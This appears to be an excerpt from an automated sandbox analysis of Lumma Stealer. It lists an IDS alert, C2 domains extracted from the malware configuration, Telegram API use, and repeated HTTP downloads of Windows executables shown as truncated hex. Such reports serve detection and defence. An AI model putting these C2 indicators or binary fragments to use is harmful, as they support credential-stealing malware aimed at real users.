            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49755 -> 104.21.60.24:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: tentabatte.lat
            Source: Malware configuration extractorURLs: slipperyloo.lat
            Source: Malware configuration extractorURLs: wordyfindy.lat
            Source: Malware configuration extractorURLs: shapestickyr.lat
            Source: Malware configuration extractorURLs: bashfulacid.lat
            Source: Malware configuration extractorURLs: manyrestro.lat
            Source: Malware configuration extractorURLs: curverpluch.lat
            Source: Malware configuration extractorURLs: talkynicer.lat
            Source: Malware configuration extractorURLs: fivenaii.click
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 00:05:52 GMTETag: "8e00-62a0cfe2cdd29"Accept-Ranges: bytesContent-Length: 36352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 83 00 00 00 20 00 00 00 84 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 c0 00 00 00 06 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc a2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 44 22 00 00 68 80 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 05 00 a9 00 00 00 01 00 00 11 73 0f 00 00 0a 0a 73 10 00 00 0a 0b 07 28 11 00 00 0a 03 6f 12 00 00 0a 6f 13 00 00 0a 0c 06 08 6f 14 00 00 0a 06 17 6f 15 00 00 0a 06 18 6f 16 00 00 0a 1f 10 8d 1c 00 00 01 0d 02 16 09 16 09 8e 69 28 17 00 00 0a 06 09 6f 18 00 00 0a 02 8e 69 09 8e 69 59 8d 1c 00 00 01 13 04 02 09 8e 69 11 04 16 11 04 8e 69 28 17 00 00 0a 06 6f 19 00 00 0a 13 05 11 05 11 04 16 11 04 8e 69 6f 1a 00 00 0a 13 06 de 20 11 05 2c 07 11 05 6f 1b 00 00 0a dc 07 2c 06 07 6f 1b 00 00 0a dc 06 2c 06 06 6f 1b 00 00 0a dc 11 06 2a 00 00 00 01 28 00 00 02 00 74 00 12 86 00 0c 00 00 00 00 02 00 0c 00 86 92 00 0a 00 00 00 00 02 00 06 00 96 9c 00 0a 00 00 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 1c 00 00 0a 03 28 01 00 00 06 0a 28 11 00 00 0a 06 6f 1d 00 00 0a 2a 1e 02 28 1e 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 1f 00 00 0a 73 20 00 00 0a 0b 07 6f 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 00:05:52 GMTETag: "8e00-62a0cfe2cdd29"Accept-Ranges: bytesContent-Length: 36352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 83 00 00 00 20 00 00 00 84 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 c0 00 00 00 06 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc a2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 44 22 00 00 68 80 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 05 00 a9 00 00 00 01 00 00 11 73 0f 00 00 0a 0a 73 10 00 00 0a 0b 07 28 11 00 00 0a 03 6f 12 00 00 0a 6f 13 00 00 0a 0c 06 08 6f 14 00 00 0a 06 17 6f 15 00 00 0a 06 18 6f 16 00 00 0a 1f 10 8d 1c 00 00 01 0d 02 16 09 16 09 8e 69 28 17 00 00 0a 06 09 6f 18 00 00 0a 02 8e 69 09 8e 69 59 8d 1c 00 00 01 13 04 02 09 8e 69 11 04 16 11 04 8e 69 28 17 00 00 0a 06 6f 19 00 00 0a 13 05 11 05 11 04 16 11 04 8e 69 6f 1a 00 00 0a 13 06 de 20 11 05 2c 07 11 05 6f 1b 00 00 0a dc 07 2c 06 07 6f 1b 00 00 0a dc 06 2c 06 06 6f 1b 00 00 0a dc 11 06 2a 00 00 00 01 28 00 00 02 00 74 00 12 86 00 0c 00 00 00 00 02 00 0c 00 86 92 00 0a 00 00 00 00 02 00 06 00 96 9c 00 0a 00 00 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 1c 00 00 0a 03 28 01 00 00 06 0a 28 11 00 00 0a 06 6f 1d 00 00 0a 2a 1e 02 28 1e 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 1f 00 00 0a 73 20 00 00 0a 0b 07 6f 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 00:05:52 GMTETag: "8e00-62a0cfe2cdd29"Accept-Ranges: bytesContent-Length: 36352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 83 00 00 00 20 00 00 00 84 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 c0 00 00 00 06 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc a2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 44 22 00 00 68 80 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 05 00 a9 00 00 00 01 00 00 11 73 0f 00 00 0a 0a 73 10 00 00 0a 0b 07 28 11 00 00 0a 03 6f 12 00 00 0a 6f 13 00 00 0a 0c 06 08 6f 14 00 00 0a 06 17 6f 15 00 00 0a 06 18 6f 16 00 00 0a 1f 10 8d 1c 00 00 01 0d 02 16 09 16 09 8e 69 28 17 00 00 0a 06 09 6f 18 00 00 0a 02 8e 69 09 8e 69 59 8d 1c 00 00 01 13 04 02 09 8e 69 11 04 16 11 04 8e 69 28 17 00 00 0a 06 6f 19 00 00 0a 13 05 11 05 11 04 16 11 04 8e 69 6f 1a 00 00 0a 13 06 de 20 11 05 2c 07 11 05 6f 1b 00 00 0a dc 07 2c 06 07 6f 1b 00 00 0a dc 06 2c 06 06 6f 1b 00 00 0a dc 11 06 2a 00 00 00 01 28 00 00 02 00 74 00 12 86 00 0c 00 00 00 00 02 00 0c 00 86 92 00 0a 00 00 00 00 02 00 06 00 96 9c 00 0a 00 00 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 1c 00 00 0a 03 28 01 00 00 06 0a 28 11 00 00 0a 06 6f 1d 00 00 0a 2a 1e 02 28 1e 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 1f 00 00 0a 73 20 00 00 0a 0b 07 6f 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 16:22:08 GMTETag: "4c000-62a1aa1957b5c"Accept-Ranges: bytesContent-Length: 311296Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d 04 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 09 04 00 00 10 00 00 00 0a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bd 20 00 00 00 20 04 00 00 22 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 d6 00 00 00 50 04 00 00 54 00 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 3b 00 00 00 30 05 00 00 3c 00 00 00 84 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 16:22:08 GMTETag: "4c000-62a1aa1957b5c"Accept-Ranges: bytesContent-Length: 311296Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d 04 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 09 04 00 00 10 00 00 00 0a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bd 20 00 00 00 20 04 00 00 22 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 d6 00 00 00 50 04 00 00 54 00 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 3b 00 00 00 30 05 00 00 3c 00 00 00 84 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 16:22:08 GMTETag: "4c000-62a1aa1957b5c"Accept-Ranges: bytesContent-Length: 311296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d 04 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 09 04 00 00 10 00 00 00 0a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bd 20 00 00 00 20 04 00 00 22 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 d6 00 00 00 50 04 00 00 54 00 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 3b 00 00 00 30 05 00 00 3c 00 00 00 84 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 21:33:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 00:05:52 GMTETag: "8e00-62a0cfe2cdd29"Accept-Ranges: bytesContent-Length: 36352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 83 00 00 00 20 00 00 00 84 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 c0 00 00 00 06 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc a2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 44 22 00 00 68 80 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 05 00 a9 00 00 00 01 00 00 11 73 0f 00 00 0a 0a 73 10 00 00 0a 0b 07 28 11 00 00 0a 03 6f 12 00 00 0a 6f 13 00 00 0a 0c 06 08 6f 14 00 00 0a 06 17 6f 15 00 00 0a 06 18 6f 16 00 00 0a 1f 10 8d 1c 00 00 01 0d 02 16 09 16 09 8e 69 28 17 00 00 0a 06 09 6f 18 00 00 0a 02 8e 69 09 8e 69 59 8d 1c 00 00 01 13 04 02 09 8e 69 11 04 16 11 04 8e 69 28 17 00 00 0a 06 6f 19 00 00 0a 13 05 11 05 11 04 16 11 04 8e 69 6f 1a 00 00 0a 13 06 de 20 11 05 2c 07 11 05 6f 1b 00 00 0a dc 07 2c 06 07 6f 1b 00 00 0a dc 06 2c 06 06 6f 1b 00 00 0a dc 11 06 2a 00 00 00 01 28 00 00 02 00 74 00 12 86 00 0c 00 00 00 00 02 00 0c 00 86 92 00 0a 00 00 00 00 02 00 06 00 96 9c 00 0a 00 00 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 1c 00 00 0a 03 28 01 00 00 06 0a 28 11 00 00 0a 06 6f 1d 00 00 0a 2a 1e 02 28 1e 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 1f 00 00 0a 73 20 00 00 0a 0b 07 6f 2
